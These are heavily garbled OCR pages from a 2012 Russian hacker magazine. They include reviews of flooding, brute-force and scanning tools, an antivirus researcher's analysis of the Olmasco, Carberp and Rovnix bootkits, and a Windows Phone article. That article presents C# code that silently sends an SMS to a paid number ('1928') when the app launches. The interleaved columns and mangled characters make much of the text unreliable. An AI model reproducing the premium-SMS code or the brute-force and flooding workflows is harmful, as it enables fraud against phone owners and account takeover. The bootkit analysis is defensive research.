Radmin . Б лагодаря инте­ грации с Radmin, наш сканер находит все маши н ы с заnущенным Radmin Sегvеги п о ­

загрузка про ц есса в РЕ E ditoг и РЕ Sniffeг;

зволяет затем подключиться к ним в один

определение О ЕР.

клик . Д ля этого на компью т ере, с которого

mymegaemai l @mail .ru:passw l ogin@bk. r u: pas s

1.

.NET CLR-npoцeccoв; Anti Dump

автоматическое снятие защиты Pгotection;

2.

изменение приорите т а процесса;

РЕ Sniffer:

осущес т вляется сканирование, до л же н б ы т ь

оп ре д е л ен и е т и п а к о мп ил я т ора/у п аков щ ика;

уста н ов л е н

обнов л е н ие б а зы си гнат ур ;

3.

3.

Radmin Vieweг.

Уд а л енное в ыключение ком п ьютеров. Эт а

Автор рекоме н дует иметь от

100 до 300

сервиса. Файл с аккаунтами должен име т ь вид :

И нт ервал флуд а с о дн ого мейла состав л яет пример н о о д ну ми н уту, п оэ т ому соз д ате ль п ро­

сканирование д и р екторий.

функ ц ияслужитд л я выключениялюбо г о

граммы рекомендуе т рабо т а т ь с ней с д е д ика,

РЕ

удаленного компьютера или г руnпы ком п ью ­

так как при этом д остигается д остаточно боль­

Rebuilder:

теровсвин д ойнаборт~

оптимизация РЕ -файл а; изменение базового а д реса РЕ- файла.

4.

на ла т и н и ц е. По дд ер­

Б ыс т рое сканирование сети. П ро га осу щ ест­

TaskVieweг:

создание дампов

2.

120 симво л ов

4.

Функция

Wake-On-LAN.

шая скорость флуд а. Из удобс т в D eath-MoЬile Эта функция п озво ­

следуе т отмети т ь п одробный ло г текущих

РЕ Editor:

ляет включать уд аленный комnьютер и л и

действий [действие, номер телефона, мыло!,

редактирование 0 05-заголовка;

гру п пу ком п ью т еров, если они поддержива ­

а также лог, в котором фиксируется, какие

поддержка но в о г о форма т а РЕ + [64Ьitl;

ют функцию Wake - On - LAN.

сообщения доставле н ы, а какие не дошли

Интуитивно понятный ин т ерфейс и удобство

до а д ресатов. Остальные фичи п рограммы ты

просмотриредактированиетаблицимпорта/

ис п ользования сканера я советую тебе оце­

сможешь изучи т ь п ри личном ознакомлении

экс п орта.

нить самостоятел ь но.

с н ей .

корректирование

CRC;

ХАКЕР

03/158/ 2012


X-Tools

..

Автор:

f,:;:-- По- ~..:йк=""::..L---,

41cJ1o ПОТСIКО8:

10

О Nc. ru

@ Reg.ru Q Who.•

З.цержка (cet~:yttA):

regexp):

~=х:t::_и-т:т':':onoe~ ЬмюmeНJCТJ)OIOtchatset

~mi'{,m.JX]}-oтmi'IAomax торе!И1 СУIФОМ symЬol ~(tМ{. IМх)} • ОТ nWI АО IМХ букв d ·цифр, ·бука 1111Н цнфр) дльтернатноа: ~IU~T08.!Jitl,lJt2HT.A,

проверкасписка доменных имен; наличие трех различных движков

Windows.

и сео шник ов всех мастей утилиту

проверки;

Dom aiп

сохранениеспискасвободных

IL:J

(TlJPT

о ~ТЬСА011еН&N9 81

~= СеобоА110:

.~chelo,nocne

Эа11ято:

котороrо 111.ет :

~~От 1 АО IOOМК!JJ08.!1 helo.ru)

Fiп deг. Как ясно из на­

звания, эта тулза предназначена

доменов в различных форматах;

для поиска свободных доменных

возможно с ть продолжить пре­

имен. Зачем тебе доменные имена?

рванную проверку;

Прога однозначно не поможет

дальше, а затем выгодно п родать

теб е зарегистрировать la затем и продать! какой-нибудь viagгa.

н уждающимся! Та кже можно создать хороший SЕО-шоп на хорошем до­ 81

мене- вариантов много

75

Qст,апосъ:

621

Всего :

702

com, но

.

что-то подобное подобрать

вполне возможно . Наприме~ вот

Основные возможности программы:

6

Ouo<&oo:

~ nн6о 1 нnн 2 ОМ!ОМ ,a,b,t

Name

Их всегда можно припрятать по­

Текущее '*'CIICI nотакое

o{l,lD} l[atx:}{1,2}1\d{2}1}

.rul .com} -...eнooюнerult1»!

nн6о жчеn (т . е .

Пр едставляю твоему вниманию про­ стонезаменимую для домейнеров

Статнсn«е работы

n-:

DOMAIN NAME FINDER, ИЛИ КАК НАЙТИ КРУТОЙ

Система:

ВЫхоА

{att 1*21 ...}·

1 ...&>2ЦНФоы

д....,._.

ДеtiстемА

Формат wаблона.(стиль

\w

al-chemisl. URL: al-chemisl.ru/ dnfinder.hlml .

проверкадоменных имен, задан­

регэпс для поиска чего -т о вроде

ных шаблоном в стиле регулярно­

xakepviag га .com: [а -zH5, 5}viag га.соm.

го выражения;

Д ерзай!

Автор:

Автор :

Автор:

Z.Razor IZerveRTeaml. URL:

www.zerverteam.com.

Marcello Pielrelli & Gianni Baini. URL:

URL: z-oleg .com/secur/aps.

Сис тема:

Ьit.ly/ukWQSX.

Windows.

Систе ма:

Зайцев О. В. 1"CP-МU)(·ТCPPOOI.Sa....-Мula.дloтoнfll05

Система:

Еd\оТСР!f>(Э:I«нн•ит дмnрВIАета..ае

sytSIII

В.Мтаное

C8flaмc0tscaod

В.Мта

Windows.

с.р.нсо.уr-

Windows.

Н.СS.

В.Мта

c.plмcOuCМICII .... Ofi)/~TIТ&ni!OH!Iol! OoorGioo(ГIOOIP"•apa...:.-в...тa C:.S:.Ifl)f'ТP

&IДIIOH

ClpllpFТP

88Л11а

T10j$11IМI\ti'Panwha.TIOIIIII...В.д110н!lol!

SSI-+aipelp

-

Web Tool- это

программа, предназначенная

для автоматизации

GET-

и РОSТ-эапросов .

Соответственно, может использоваться для

б рута/пареи н га/чекин га/на крутки хостов/ата­ ки/прокси-чекинга и т. п. Во всех полях программы lза исключением п олей Data и U seгAgeпt l п оддерживаются следующие переменные :

#user# - ЛОГИН , #pass# - пароль , #mdS(user)# -ЛОГИН В mdS, #mdS(pass)# - параль в mdS, #tokenl# - #tokeп(l-X)# - токены, #count# - счетчик брута. В коде, полученном после запроса с токе­ нам, осуществляется поиск указанной строки.

На тему безопас н ого стирания данных велось

но очень нужная программа. Она проел у шива­

ее и познакомить тебя с очередной тематиче­

ет несколько сотен портов [указанных в обнов­

ской утилитой. Имя ей-

ляемой базе д а нных программыl, имитир уе т

Files Тегm i паtог.

Эта

у т илита обеспечи вает конфиденциальность

наличие на ни х уязвимых сервисов и анализи­

твоих данных, полностью удаляя приватные

рует все подключения по этим портам.

д окументы, изображения, ви д ео и другие фай­

Эта программа в основном предназнач ена для

лы путем перезаписи свободного дискового

обнаружения хакерских атак. Как известно,

пространства. В процессе «стирания>> файлов

сканирование портов помогает определить тип

их содержимое несколько раз перезаписы­

операционной системы и обнаружи ть потен­

вается случайными данными и предопреде­

циальноуязвимыесервисы[например,почту

ленными символами, таким образом, восста­

или web-cepвepl . Посл е сканирования портов

нов и ть эти файлы будет нельзя. Кроме того,

многие сканеры определяюттип сервиса, пере­

программа позволяет <<очистить>> свободное

давая тестовые запросы и анализируя его ответ.

пространство с помощью сложных алгоритмов

Утилита

шифрования, для того чтобы безвозвратно

ипозволяетоднозначноустановитьфактатаки. Кроме этого, утилита может применять ся для

были удалены небезапасным способом.

выполнения следующих задач:

Программапредоставляет на выбордевять алгоритмов удаления инфы :

Режим sоuгсе-файла:логины и парали

в виде пick;pass берутся из одного файла.

2.

Режим двух файлов: логины отд е льн о, паро­ л и отд ельно.

З.

Режим цикла: программа сработаетука­ занное количество раз без использования ЛОГИНОВ И паролеЙ.

ХАКЕР

03/158/2012

APS проводит обмен с атакующим

уничтожить даже те файлы, которые ранее

если нужно, п осле Х следующих сим волов! и выполняется до коне ч ной строки !ча щ е всего она состоит из символа< или «1. Прога имеет

1.

APS [Aпti Ро г t Scaпneгl- это маленькая,

уже немало разговоров, но я хочу продолжить

Счи т ывание н ачинается сразу после н ее !или,

три режима:

Вlдl•аное

-

1.

П севдослучайный.

2.

Британский ,

З.

Случайный.

4. 5.

Р оссийский, ГОСТ Р50739-95.

5220.22-MIEI. 6. Н емецкий, VS IT R. 7. Канадский, RCPM TSSIT OPS-11. 8. Алгоритм Брюса Шнайера . 9. Алгоритм Питера Гутмана.

тестирование сканеров портов и про верка

о

тестирование файервола и оперативный

о

блокирование сетевых червей;

о

тестирование антитроянских и антивирус­

сетевой безопасности;

HMG 155.

Алгоритм министерства обороны США,

об наружение разного рода атак; о

кон трольего работы;

DoD

ных программ, систем

IDS;

блокирование троян скихпрограмм,пере­

численных в базе.

075


Матросов Александр , S en io г ma lw aгe ге sе агс h е г,

ESET ·

есепая v китов САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 2011 ГОДА В ВЕСЕЛЫХ КАРТИНКАХ Март этого года- самое правильное время для подведения итогов года прошлого. Ну, сам понимаешь: новогодние каникулы уже позади, до майских

Load MBR

праздников еще далеко, голова светлая- можно и итоги подвести.

rea d mod e

LoadVBR 1

rea d mode

1

-----------,

load malicious : MBR/VBR __________ ,1

Load bootmgr о

Bootkit

РоС

evolution:

./ Mebroot (2007)

./Vbootkit (2007)

./ Mebratix (2008)

./ Stoned Bootkit (2009) v' Evilcore х64 (2011) v' Stoned х64 (2011) 1. Развитие современного

буткитастроения

,----------NT kernel :

Bootkit Threats evolution:

./ еЕуе Bootroot (2005)

./Vbootkit v2 (2009)

Рис.

о

read mode/ protected mode

, ___________ modifications ,1

Load winload.exe о г winresume.exe

./ Mebroot v2 (2009) v'Oimarik (2010/11)

,-----------, load rootkit

read mode/protected mode

./Oimasco (2011) Load kernel and boot start drivers

./Rovnix (2011) v' Carberp (2011) Рис.

2. Схема

загрузки буткита

driver , ___________ ,1


Веселая тройка буткитов

Рис . З . Модифицированная

VBR на зараженной системе

MBR Code

MBR Code

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3 Partition ТаЫе Entry #4

•••• •• • • ••• • •• •• •

.......

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3

MBR Data

Bootmgr Partition

Bootmgr Partition

05 Partition

..

Partition ТаЫе Entry #4

MBR Data

........

• ••• • ••·=·• ••• ..•,• . -=· • • ..... •

.....

...

05 Partition

............. Unpartitioned Space

Olmasco Partition .i

Before infecting

4. Раздел для

D

комnонентов буткита

'

After infecting

Empty Partition Entry Рис .

:·-:

Active Partition Entry

Existing Partition Entry

Olmasco

т очки з р ения развит_ия в ре д о н осного про гр аммнаго обе­

ядра и используют интересны е технологии. Развитие современно­

спечения п ро ш е д ши и го д можно охарактеризовать как год

го б у ткитсстроения можно изобразить в виде схемы , представлен­

развития 64-битных буткито в . Е сли в

ной на рис.

2010

году мне был

известен лишь о д ин бу т кит д ля 64-бит н ых систем- Win64 /0imaгik

1.

Здесь отображены наиболее значимые моменты как в развитии

ITD L41, то в этом году мы п о л учили интересн ы й букет из Rovn ix, ZeгoAccesslupdate l , TDL4 Iupdatel, СагЬегр, Olmasco !также извест ­ ный как MaxSSI. И это т о л ько те у г розы, кото р ые умею т обходи т ь

диска IM BRI или другой за г рузочный код, который о т рабатывается

защи т ные меха н измы пр о в ерки ц иф р овой под п иси д ля мо д улей

еще до начала инициализации операционной системы, вредонос-

Р о С-реализаций, так и в воплощении этих технологий в боевых вредоносных программах. Заражая загрузочный сектор жест к ого


Рис.

6. Функция загрузки файла из скрытой файловой системы- Olmasco

на я программа может получить контроль над загрузкой компо­

ТА-ДА-ДАМI ПЕРВОЕ MECТQI

нентов операционной системы, чтобы внести модификации в этот

Итак , первое место по технологичности занимает

процесс.

угроза интересна в первую очередь тем, что модифицирует

Именно эти модификации в дальне йшем позволяю т обходить механизмы проверкицифровой подписи и загружать вредоносные

Эта

VBR [Volume Boot Recoгdl и имеет полноценную собственную файловую

систему для хранения дополнительных модулей и других ком­

драйвера в обход защитных механизмов. Но давай все-таки вер­

понентов. Как выглядит модифицированная

немся к нашему хит-параду сложных угроз, тем более что их спектр

системе, показано на рис.

действ и тельно очень широк.

Dlmasco.

VBR

на зараженной

3.

Большинство антивирусных продуктов научились эффективно

В прошлом году первое место нашег о рейтинга занял Stuxпet,

справля ться с активным заражением буткитам и, использующими

а в одном из последних номеров я уже описывал механизмы рабо­

модификацию

ты Duqu [обнаруженного осенью младшего брата Stuxпetl. Но , увы,

нее сказа ть , стали рыть глубже для противодействия антивирусам .

MBR.

Однако злоумышленники пошли дальше, а точ­

на этот раз ему не суждено попасть в наш рейтинг, так как львиная

Это вызвало у некоторых антивирусных вендаров определенные

доля используемых им технологий уже знакома нам по червю

сложности, в результате чего злоумышленники получили возмож­

Stuxпet [хотя, если бы авторы проплатили рекламное место в жур­

ность оста ваться незамеченными в системе. Ус тройство внутрен­

нале «Хакер>>, мы бы поместили их творение на первое место :11.

ней файловой системы также заслуживает отдельной статьи.

Duqu

разработан на основе той же самой программн ой платформы.

Из его Запомнившихея особенностей стоит отметить, пожалуй, только эксплуатацию шикарной 0-dау-уязвимости

CVE-2011-3402

В конце жесткого диска создается полноценный раздел, в котором

размещаются все компоненты буткита [рис.

41 .

Файловая система хра нит время и дату создания файла и даже

для загрузки вредоносного кода в ядро и повышения привилегий,

контрольную сумму для проверки целостности. С точки зрения

но это уже тема для отдельной статьи ;l.

технологичности буткит с этой файловой системой благодаря ее


Веселая тр ойка буткитов

структуре превосходит все другие угрозы, использующие скрытые

файловые хранилища. Сигнатура корневой дире ктории скрытой

файловой системы приведе на на рис.

5.

Функция загрузки фай ла из скрытой файловой системы в руткит-драйвере представлена на рис.

ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ

6.

Так как драйвер написан на чистом С без обфускации, нам уда­

лось декомпилировать ко д драйвера при помощи

IDA

и

СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ

Hex -R ays

и таким обраЗ'ом восстановить его структуру. Не менее интересен и процесс модификации системы во время

ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ

ПРИВИЛЕГИЙ В СИСТЕМЕ

загрузки. Э т от довольно сложный процес с проиллю ст рирован на рис.

7.

Д ополнительно стоит отметить и то , что

Olmasco,

ТУ- ДУ-ДУМI ВТОРОЕ

как и

имеет буткит-часть, которая модифицирует библиотеку

TDL4, kdcom.d ll.

MECTOI

Второе место по праву занимает обно вленная версия СагЬегр, ко­ торая обзавелась достаточно любоп ытным буткит-функционалом.

Именно она отвечает за отладку ядра при пом о щи WiпDbg, а после ее модификации отладчик не может подключиться к системе для

СагЬегр вообще можно назвать не только одной из самых техно­

удаленной отладки. В итоге вариантов остается не так много: либо

логичных, но и самой жадной вредоносной программой прошлого

иссле д овать все мо д ули в статике [в случае если их уже удалось

года. Этот бутки т атакует наиб олее извес т ные дистанционные

извлечь из скры той файловой сис темы] , либо пытаться в ернуть

сис тем ы банко в ско го обс л уживания, но р ечь сейчас не об этом.

ориги н альн ы й

Впервые идентич ный буткит-ф унк ционал появился у Wiп64/Rovпix,

kdcom.dll

и грузить вредо н осный драйвер вр у чн ую.

Исследовать функцио нал бу т кит-части тоже не та к-т о просто,

котор ый в нача ле лета д оставил нема л о хлопот пользователям

но в этом нам поможет эмулятор

рунета. СагЬегр и Ro vп ix базируются н а одном буткит- коде, инфор ­

ранней стадии загрузки прямо Итак,

Olmasco

Bochs и отладка из IDA Рго.

системы на самой

мация о продаже которого неоднокра т но в стреча лась на разны х

получил первое место за технологичность соб­

кибе ркрим ина льных форума х в начале пр ош лого го да .

ственной файловой системы и оригинальный механизм буткита , который использует ря д наработок из

TDL4 и

Изнача льно

Continue kernel initialization

Loal MBR

Load "drv32"

is loaded апd executed

iпfected

ог

"drv64"

Call KdDebuggerlnitialize1 from loaded kdcom.dll

LoadVBRof mallclous partltion

substitute kdcom.dll with "dbg32" о г "dbg64"

VBR is loaded апd executed

Load "\boot" from mallclous flle system "\boot" is loaded executed

Рис .

апd

Hook BIOS lnt 13h handler load original VBR

Load wlnload.exe

Substitute Ems E пaЬied optioп with Wiпpe

VBRof originally active partition is loaded апd executed

Load kernel and boot start drivers

Рис .

7.

Bootmgr is loaded апd executed

имел только функционал для пользова­

с бутки то м. В процессе анализа свежих дропперов мне попались

за счет нестандартных системных модификаций .

mЬг

Carberp

тельского режима, но прошлей осе нью были создан ы модификации

затрудняет лечение

Read bcd

Процесс модификации системы во время загрузки- Olmasco

8. Покупайте наши буткиты!


Р ис.

10. Д е ко м пилированны й

к од , отв е тс т в е нны й за эк сплуатацию у я звимастей -

на глаза любопытные строкавые константы из уже распакованного

установщика [рис .

Рис.

Carberp

91 .

11 . Снятие х уков

и спnайсов с системны х функций в исполнении

Carberp

MS11-011 [win32k.sys SystemDefa ult EU DC Font vul nl; NЕТ Runtime Optimization vuln l http:l/osvdb.oгg/show/osvdЬ/71013 ).

Эти строчки сразу наве л и нас на мысли о системных модифи ­ кациях, производимых буткитом. Н о давай снача л а погово р им о дропп е ре, который содержит целый букет зксплойтов для повы­ шения привилегий. В первую очередь их наличие свя з ано с тем ,

Д еком п илированный код, эксплуатирующий уяз в имос т и, п ри­ ве д ен на рис.

1О.

Ещ е одной инте р есной особеннос ть ю работы д р а п пе ра я в ля ­

что для установки буткита требуются привилегии администрато-

ется с н ятие различ н ых хуков и сплайсов с некотор ы х систе мны х

ра или системы. У корпоратив н ых пользователей [а именно они

ф у нкций переднепосредствен н ым за п уском бу т ки т- уста н овщика

являются целью злоумышленнико в! , имеющих д оступ к ДБ О, может

[ ри с .

п росто не быть п р ав на запуск ис п олняемого файла с высокими

111.

Это своего рода обход различных п есочниц и сре д с т в мони ­

п ривилегиями, и мето д ы социальной инженерии тут уже не по­

торинга, которые ис п ольз у ют хуки в пользо в ател ь ском режиме.

могут. П озтому сейчас уста н овщик эксплуатирует четыре раз н ых

В процессеработы буткит-части в обхо д меха н измо в про в ерки

уязвимости для п овышения локальных при в илегий в сис т еме:

М 510-073

lwin32k.sys Keyboaгdlayout vuln l; М 510-092 [Task Scheduleгvu l n);

цифровой по д писи и других средств за щ и ты з а гружае т с я вр е ­ д онос н ый драйвер. За д ач е й этого драйве р а я вл яется в не др ение полезной нагрузки в адре с н ое пространс т во u sе г-m оdе-процессов . Д о этого испо л ьзовались методы внедрения в по ль зо в а т е ль ском

р ежиме, такие ка к N tQueueApcT hгead[J/NtResumeT hгead[). Фак т ически С агЬегр сос т оит из трех частей: бутки т- части, за­

ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ

ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ СИСТЕМНЫХ ФУНКЦИЙ

гружаемого ей д райвера, и dll-модул я , в н ед р яемо г о др айвером в п ользова т ельском режиме. Странно, что раз ра бо тчи ки не ис ­ пол ь зовали все возможнос т и, которые им пре д ос т авл я ет загру ­

женн ы й ко д н а уро в не ядра системы . В се перехваты системных функ ц ий уста н авливаю т ся уже в не д ре н ным мо д улем в по л ьзо­ вательском режиме. Их ле г ко об н аруживаю т та кие инс т румен т ы, как

GM ER

или

RKU.

СагЬе г р получил второе место за техноло г ичность, та к как з т о


Веселая тро йка буткитов

·-----success ·--· 1

Loal MBR

-----·fail----·

1 1

'

Real mode

r-----

---------- Win 2000·------------ •

1

LoadVBR

1

Real mode

WinXP r - - ...

' ',

>< ·с:

>

о

1

,

.

Load bootstrap code

0:::

1

success

,

~

fail

с:

~

1

real mode 1protected mod

1

'

Determine 05 Digit Capacity

Load bootmgr

1

1 1 1

'

lnstall Corresponding Kernel mode Driver

rea l mode 1protected mod

Call SheiiExecuteEx API with "runas"

Load winload.exe or winresume.exe

1

1 1 1 1 1 1

Overwrite Bootstrap Code of Active Partition

________

lnitiate System Reboot

Рис .

12. Заражение системы

буткитом

.,

.

real mode 1protected mod

' '

Self Delete and Exit

Рис.

Rovnix

первый банковский буткит, который эффект ивн о работает к ак

в х86·, та к и в х64-сис тем ах. В

2012

Load kernel and boot start drivers

г о д у, я дума ю, мы еще не раз

Итого, Rovпix стал п ервой угрозой, по казав ш ей неэффектив­ ность многих антивир усных пр о д ук тов , которые проверяли целост­

ность только

услы шим об этой вредоносной пр ограмме.

13. Загрузка Rovnix

MBR.

В итоге вектор атаки, используемый буткита ми,

получается практически неисчерпаемым, пока целостность си­

ТРЕТЬЕ МЕСТОI БЕЗ ФАНФАР

стемы проверяется на поздних этапах загрузки системы . По сути,

Треть е п оче т ное место нашего хит-парад а занимает Rovпix,

сейчас систем а загр ужае тся всегдананедоверенной платформе.

ко т о рый первым стал испо льз о вать модификацию областей за­

Возможно, технология SecuгeBoot исправит эту ситуацию в WiпB ,

грузочного кода, о тличног о от

но это будет еще не скоро .

проиллюстрирован на рис .

MBR.

Процесс заражения системы

12.

Как видно из б л ок - схем ы , в процес се заражения, за исключе ­

ЗАКЛЮЧЕНИЕ

нием э тапа модификации В ооtst гар- кода, нет ничего необычного.

В этом году в нашем хи т-параде самых технологичных у гр оз

B oo tstгap- э то ча ст ь загрузчика, которая отрабатывается сразу

присутство вали вр едонос ны е пр о гр аммы, имеющие различный

п ос ле инициализации VBR IVol ume Boot Recoгd], н о п еред загруз­

буткит-фу нкционал и со дер жа щи е скрытые файлов ые системы.

кой сис темног о bootmgг. Именно это и позволяет впоследствии

Всё это в первую очере дь пр извано скрыва ть вредоносные п ро­

влиять на загрузку системы. Ro v пi x, как и

граммы о т антивирусных продуктов, п ротиводействовать лечению

Olmasco,

использует

скр ыт ую файловую сис тем у для х ран ения своих компонентов и по­

активного заражения и затруднять проведение криминалистиче­

сле д ую щег о д оступа к ним при помощи буткит-ко да , но, в отли ч ие

ской экспертизы. В наступившем году проще жить не станет, и я

о т файловой системы

думаю, что многие из описанных в этой статье векторов уже себя

Olmasco,

она устроена довольно примитивно ,

то есть, п о сути, представляет собой просто область диска , в кото­

исчерпали и в нашем следующем хит-параде, возможно , появятся

рую записаны данные, и не имее т какой-либо сложной структуры.

угроз ы , использующие специфические особенности со вр еменных

В пр ин цип е, в описы ваем ом с л учае эта облас ть с д анными нужна

процессоров, такие как многаядерность и аппаратная вирт уализа­

лишь для того, чтобы в проце ссеработы буткит мог прочитать

ция . Но с точки зрения реальных угроз это возможно только в слу­

необходимые компо ненты и заменить ими о р игинальные п ри за ­

чае их рентабельности, поскольку, как показывают мои наблюде­

гр узке системы.

ния, кибеприступ н ики- крайне прагматичный народ. :Х:


MALWARE

Юрий «yurembo» Язев

ь

для мобильных

lyazevsoftldgmail.coml

-

Чтобы создать

объект класса

MediaEiement (nроизводным от него является

объект mediaSoundl,

<<ОКОШеК>>

ment Height="120" Name="mediaSound" Width="160" />.

ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ

wjndowsphonehack·

ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ НАПРАКТИКЕ Вообще-то в нашем журнале работает полно фанатов винды, скажем я

или наш редактор, доктор Лозовский . К счастью, он очень обижен тем фактом, что MS слишком долго тянула с обновлением его любимой WM6.5, и поэтому поручил мне хорошенько разобраться, как в новой системе обстоят дела с малварью и уязвимостями. Вперед!

надо в ХАМL-код добавить такую строчку: <1\ediaEle-

Н&~Ш~- хороший сайт, содержащий много интересной мифы о хаках WP

7-7.5.

На диске находятся

три nроекта,

разработка которых описана в статье .


Мал в арь дл я моби льн ых <<окошек>>

rn

о недавнего време н и в стане

WP бы л о дос т аточно спокой Windows Phone 7.5

.

но, но в середине декабря на п л атфо р ме

__

..,......

.,_" ....,._ .,_,_ ..__"_..,

~ .._ DМc....,.tGIIOI

неожиданно был зафиксирован фак т р е бут а операцио нн ой

..........__ . ,..м~

.......

сис т емы, в результа т е которо г о, п осле получе н ия специал ь но под г о­

товленного СМС-сообщения l g oo. g i /Y Ыru l , функция от п равки и чте н ия эсэмэсок перестает работат ь . Тако го же эффек т а мож н о д оби т ьс я , от­

__ "_

;;. ~.н-s,

.,.

··

- ~.ь.~

- ~tT)'II*

VIO,Pf)UIII).OЦ.C

4

А сообщение , автор которо го имеется в т айле н арабочем столе, может

-~~ 4

.. ~т ...

.

._...

1&JIW<ci18IOIICIIIOO

...__ ... ..,..._,

,_,. ......... _"

~~~OIIUI((-U­

~~-)IN

...... ......,., ......,., .,.,.......... _,. .,....... ...... ,_,., _., lt(6.JoU.tUZ

~н.fкоо

,.,

"'"'-""" ...............

правив особое сообщение из социал ь ной се т и [ н апример, из Facebookl.

.__"_..,

f'Ю1VI-161.\-.4W.~D<IfD){C.U....

.,.,.,...,._,-.....-ao>J

заблокиро в ать все функции телефона! Этот ба г- не новинка в мире мобильных устройств, в свое в ремя им также страда л и и айфо н ы, и андрои д ы .

Ес л и не брать во в н има ни е п осле д ний рассмо т ре нны й э пи зод , т о

этот ба г не так уж и критичен, особенно по срав н ению с СМС - атакой

Реда к тируем реестр

на айфон, которая позволяет атакующему получить п олный кон т роль над устройством. П ользова т ели ан д рои д ев тоже были в опасности: << СМС-смерть» выкидывала телефон в офлайн или, что даже хуже,

Parameter и уже там

предоставля л а атакую щ ему по лн ый дос т у п к системе .

ви в единицу, PortaЫe D eviceNameSpace E xclude F romShell- в нуль,

ShowlnShell

устано­

EnaЫe l egacyS up port - в е д ини цу.

В настоя щ ее в р ем я из << т рех к ит ов>> только

WP 7 уязвима д л я 2012-rol, обновле ния , Microsoft в последнее время

СМС-атак . Когда п и сались эти строки [я нв арь устраняющего этот глюк , еще не было.

измени следующие ключи:

Использо в а т ь

WP 7 как

модем без сnец и аль н ых nриготсе л ений

т оже было нельзя. Н о, к счастью , в

WP 7.5 это

недоразумение бы л о

довольно часто выпускает апдейты для своей мобильной оси , поэтому

исправлено . Правда, последнее слово всё равно остается за операто­

будем надеяться, что исправление последует очень скоро .

ром сотовой связи, и если тариф не п ре д назначен для расшаривгния интернета, то им п ридется nользова т ьс я исключите л ь н о на мобиль н ом

девайсе

[xe-xel.

ХАКЕРСКИЕИССЛЕДОВАНИЯ Перейдем от обзоров чужих ха ко в к реализации собстве нн ой мал вари.

не один раз взломать систему, поз т ому мы рассмотрим лишь некото ­

рые из этих ха ков, самые вы д ающиеся и общест в енно полезные.

Несмотря на то, чт о WP в целом выгля д ит <<неломаемоЙ>> сис темой (что MS ;11, у хакеров, как у Мальчи ш а - Кибальчиша,

:1

довольно странно д ля

Как известно, чтобы разлечить устройство под управлением необходимо пройти утомите л ьную проце дуру ре г истра ц ии

Phone Marketplace

WP 7, в Windows

есть тайные ходы, и их не засыпать .

и вдобавок за пл а т и т ь

тов>>. Однако умельцы из

99 <<веч н озеле н ых прези д ен­ ChevronTeam изготовили ту л зу ChevronWP7,

П риложения для

WP выполняю тся

по д

.NET в

ок р уже н ии

Silverl ight.

Это значит, что н ам н ичего не придется nиса т ь с нуля и можно буд ет воспользоваться готовым

которая разлочивает систему.

Эта утила тоже не бесплатна, но за нее при д ется отдать несравни­

API.

П роще всего отправи ть

SMS

на платный

номер. Так пускай на ш е <<nолезное>> приложение де л ае т это сразу

мо меньше - девять <<nрези дентов>>. Она кор р ектно функционировала

после запускаl Д ля того чтобы можно было обрабатыва т ь события

только на

жизненного цикла приложения, надо подключить следующее про ­

WP 7,

а так как

Mango MS

пофиксила ба г в

ис п ользова л а nрограмма, то теп е р ь ути л а

WP 7.5, который от Chevro nTeam не работа­

странство име н :

ет. В принципе, есть е щ е один д же д айский с п особ разб л окироват ь устройство для запуска сторо н них п риложений. Дл я каждого произво ­

usi п g System .Wiп dow s.N av i gati o п ;

дителя он с в ой, количество действий, необходимых для достижения

цели, тоже различается. Как говорится, Гугл в помощь!

:1

Кроме того, надо добавить пространство имен Microsoft.Phone. Tasks, чтобы работ ать с SMS и мылом (см. н иже ! . За тем напишем об­

П ользователь новой мобильной <<фо рточки>> не имеет доступа

работчик события, в оз н икаю щ его пр и заг р узке приложе н ия:

к файловой сис т еме смартфо н а. П о д к л ю ч е нн ое устройство не ото­

бражается в Эксnлорере как д о п о лн и тель ны й диско в ый н акоnи т ел ь, но это легко исправить. Сnер в а отключидевайсот компьютера для

protected override void

чистоты эксперимента, открой редактор реес т ра, разверни ветвь

{

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControiSet\Enum\USB, там найди строку ZuneDriver, далее открой ее материнскую в етку Device

БЕЗОПАСНОСТЬ Посмотрим , что

Microsoft сделала для безоnас ­

4.

стае имен

во й с истеме смартфона . IКазало с ь бы , э то

чтобы легко шифровать данные .

В ес ь код уnравляемый !выnолняет с я nод

ограничивает наши возможн о с т и , н о, если

задуматься , часто л и тебе nр их одится

ч е го следует, ч то !nо­

коnаться в содер ж и м о м своего т е л е фона?

К тому ж е безоnасн ос ть- nр еж д е в се го . !

вр е д систе м е .

Ка ж дое nрилож е ни е выnолняется в своем

nространстве- к а м ере

3.

Пользователю заnр е щен до с туn к фа й ло­

.NET Compactl , из

те нциально! ни к ак о е ПО не может нанести

2.

SmsComposeTa sk msgSMS = пеw SmsComposeTask(); msgSMS. Body = "Наше зло-сообщение" ;

WINDOWS PHONE

ности своей мобильной ОС .

1.

5. 6.

обособленно от дру г и х nриложений , таким образом , к ни м ни к то не имеет до с т у nа, к роме самого nрил ож ения.

03/158/2012

Приложения можно у с танавливать только из

ichamberl .

Ка ж дое nрилож е ни е х ранит с вои данные

ХАКЕР

Oп N a vigatedTo(N avi g a tioпE ve пtArgs е)

Windows

Рhопе

Marketplace . SSL . Впроч е м ,

Данные nередают с я через

было бы странно , е сл и бы было инач е.

7.

Разработчик м о же т использовать к лас с

ProtectedData

lна х одящи й ся в nростран -

System .Security.Cryptograph yl,

8. WP 7 nоддерживаетсл е дующие алго­ ритмы шифрования : АЕS, HMACSHA1 , HMACSHA256, Rfc2898DeriveByte s, RSA, SHA1, SHA256 . 9. Встроенный браузер, мобильны й IE , н е nо­ зволяет устанавливатьдоnолнительные nлагины .

10. Приложения,

разработанные не в

Microsoft,

не м огутфун к циониров а ть в фоново м р еж и м е .

083


MALWARE msgSMS.To = ""1928"" ; msgSMS. Show();

}

СПОСОБЫХРАНЕНИЯ

П оследняя коман да листинга формирует и отправляет сообщение; остальной код в комме нтария х не нуждается.

